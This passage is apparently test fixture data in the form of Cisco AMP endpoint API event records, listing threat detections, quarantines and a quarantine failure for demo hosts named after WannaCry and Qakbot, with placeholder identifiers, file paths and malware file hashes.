Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835281","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":537000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835280","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":100000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":975000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3060,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":897000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":796,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":850000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":726000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867975","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":694000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867974","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":632000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":632000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":585000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":554000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":1064,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":460000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":1064,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat 
